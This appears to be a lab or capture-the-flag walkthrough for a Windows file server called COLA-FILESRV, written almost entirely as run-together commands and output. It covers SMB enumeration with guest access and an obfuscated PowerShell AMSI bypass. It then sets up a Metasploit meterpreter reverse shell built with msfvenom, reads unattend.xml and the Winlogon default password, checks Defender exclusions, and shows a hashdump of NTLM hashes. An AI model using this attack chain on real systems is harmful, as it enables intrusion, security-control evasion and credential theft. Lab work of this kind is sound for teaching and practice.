COLA-FILESRV
nmap -sV 192.168.2.0/24nmap -sV 192.168.2.21 -sCcrackmapexec smb 192.168.2.0/24 -u '' -p '' --sharescrackmapexec smb 192.168.2.0/24 -u 'Guest' -p '' --sharescrackmapexec smb 192.168.2.0/24 -u 'Guest' -p '' --shares
smbclient -N \\\\192.168.2.21\\files
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.2.1
LHOST => 192.168.2.1
msf5 exploit(multi/handler) > runmsfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1
use post/windows/gather/enum_unattend
type C:\Windows\Panther\unattend.xmlGet-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "DefaultPassword"(Get-MpPreference).Exclusionpathmeterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5080c59420d5da01b197e2920da4e0a9:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
testuser:1000:aad3b435b51404eeaad3b435b51404ee:64cbb76dcafe2e977794f6251f8231fb:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Last updated
Was this helpful?